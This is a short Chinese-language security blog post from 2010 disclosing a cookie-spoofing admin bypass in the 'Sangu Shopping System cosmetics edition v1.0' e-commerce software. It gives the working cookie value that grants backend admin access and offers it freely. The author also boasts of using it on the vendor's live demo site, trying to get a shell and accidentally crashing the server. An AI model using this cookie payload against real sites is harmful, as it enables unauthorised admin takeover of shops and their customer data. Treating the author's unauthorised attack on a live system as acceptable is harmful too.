三顾购物系统化妆品版 v1.0 后台cookie欺骗漏洞

2010, July 19, 9:47 AM. 漏洞分析
Submitted by admin

FROM http://www.st999.cn/blog

程序:三顾购物系统化妆品版 v1.0 

其他版本未试 

刚刚在官方演示站上搞,进了后台要拿shell,结果备份数据那儿搞错了,晕,官方被我搞挂了,不试了,小小漏洞一枚,送给大家了。

 

cookies:    ASPSESSIONIDAACBDCBQ=BMAFNPMBNLDEFDHHLGPCDMJL; www3gushopcom=admin=admin; OrderBy; ShowType; prodpage=1

Tags: 三顾, cookie

« 上一篇 | 下一篇 »

只显示10条记录相关文章
SemCms后台cookie欺骗漏洞 (浏览: 15555, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):